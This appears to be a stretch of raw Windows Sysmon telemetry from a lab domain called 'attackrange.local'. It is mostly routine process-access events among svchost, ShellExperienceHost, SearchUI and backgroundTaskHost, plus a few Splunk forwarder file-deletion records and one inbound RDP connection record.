07:51:48.520{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048625Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:48.520{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048624Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:48.520{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048623Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:48.520{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048622Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:48.520{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048621Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:48.520{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048620Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:48.520{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048619Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:48.520{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048618Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:48.520{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 354300x8000000000000000807493Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:48.196{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse95.53.247.168shpd-95-53-247-168.vologda.ru16604-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 23542300x8000000000000000807492Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:49.379{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FB21AA7180C8B43A23A992F47DB272BD,SHA256=71DBCCA8263575F075B94D1D36D5A01E31DDBC4F02143A9FD7801B9A77B86170,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807491Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:49.379{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=507D35E148AF0D65C3BB4042A3164ADF,SHA256=AA273CCA0CF341FB8A92DA35B4704ED3F2ED4278AF5A7FC569AB0245B10888D1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807490Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:49.223{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A3C6B3A5BDAC193BB0884FB844550BE,SHA256=9B91D64718F80180E31F19DA49D15391271EC08FC11220093727FA0982468788,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048669Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:50.934{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048668Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:50.934{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048667Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:50.934{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048666Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:50.934{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048665Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:50.934{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048664Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:50.934{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048663Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:50.934{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048662Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:50.934{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048661Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 